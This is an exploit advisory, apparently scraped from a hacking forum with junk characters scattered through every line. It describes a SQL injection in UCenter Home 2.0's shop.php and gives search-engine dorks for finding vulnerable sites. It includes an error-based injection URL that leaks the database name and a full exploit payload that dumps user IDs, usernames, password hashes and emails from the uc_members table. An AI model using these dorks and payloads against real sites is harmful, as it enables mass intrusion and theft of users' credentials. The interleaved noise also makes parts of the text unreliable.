: w, Z/ c8 o+ L& d9 O) ?__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
& e/ d! |' M+ k+ I4 V# _3 P/ k- J" k/ y! o; [: A$ g" V$ h
2 \( Z" t, x, D3 { E1 J
, f8 f6 G. `9 Q( T: J v*/ Author : KnocKout
" I6 ~3 Q8 Y3 ?
9 d; v% y( L/ E1 ^' ^*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
" `3 U/ E8 b5 P) F( ^
% J! H& ^2 e; A% f3 _*/ Contact: knockoutr@msn.com
5 e- Y+ j8 ]" z P- @3 E
6 J( k+ f. Q! v*/ Cyber-Warrior.org/CWKnocKout 8 `: x3 \) Z: i5 o( M
+ L- G1 }/ e7 @( {% j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 r4 @' P1 Y! V. ?$ M* J
' u. s6 \5 V6 k3 w& r1 W2 d3 uScript : UCenter Home
2 g& j0 I2 ?$ J1 K ~, g1 a, z& x& t: Y7 h6 c* l: D
Version : 2.0
1 O! i5 p5 b# }$ d3 w4 _$ g V) @8 D1 b. A# R
Script HomePage : http://u.discuz.net/ " K7 K% `- m- q3 |7 h5 i$ C. J. I
( }$ n2 j" L6 I/ z% [+ q: o. ?__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # p0 Q6 o0 v9 c# C: P7 @
9 u& G# j* j% g, i. U7 L* C3 JDork : Powered by UCenter inurl:shop.php?ac=view
% c# j4 {4 \$ {# b
4 r2 @& J4 u) r5 R& r9 eDork 2 : inurl:shop.php?ac=view&shopid=
7 k& I. g" _$ k# Y/ h" g! t% O; J0 E5 v9 A+ s( t/ T
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 8 d/ h( M& B4 w- L: V" L6 x4 ?3 M/ D
% K7 X! ~4 g+ BVuln file : Shop.php
3 Q2 Q1 x# ~: {7 J: J
+ J+ z4 P2 y1 avalue's : (?)ac=view&shopid= * v# l+ i) X: }, ~' p8 X, Q, |
% ]& @& } M! J
Vulnerable Style : SQL Injection (MySQL Error Based)
% c! z2 d) S9 |$ [2 l6 r C% E9 o
1 _2 [4 o0 L& L- H- e, x% _% ~+ \Need Metarials : Hex Conversion
/ a" V" G, f; [' B4 G/ d& \% k! h7 ^" I2 k
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % t: O# | x( n; w8 N1 t
8 ~2 W7 \- y. Z, oYour Need victim Database name. 3 X+ E# G/ U! A
4 O* t/ F( C& s& b# ]6 Ffor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
$ S( n% Q% i$ n3 T* W5 U
6 E. `; f6 _, H" G# Q.. ! o! S1 T. C. r; g) z" r
8 ~/ R; W9 }9 o* n4 V! HDB : Okey.
" v! b3 Y; r2 m9 \( J+ h
3 v7 N) l6 g! k! l/ x0 p8 B: g. Xyour edit DB `[TARGET DB NAME]` : q( L7 ^, b% R3 j0 b
7 V$ O% A& w; c1 Y3 f
Example : 'hiwir1_ucenter' - P, M; ~/ X2 M- C. s# I& y
" M; D6 X" {- }5 A. p
Edit : Okey.
( L% f K5 `6 X% b
9 z$ u: n5 J0 a5 R! B/ DYour use Hex conversion. And edit Your SQL Injection Exploit.. 6 W' r+ u+ m5 w9 {; Z; K
! [! u$ I) s# z3 M
6 d0 k" Y* \1 a9 @1 e7 m1 d. ^+ p
5 |* D% ?+ R+ T* @0 XExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 S$ D7 w, @% \$ c$ |9 u* U. X/ \
|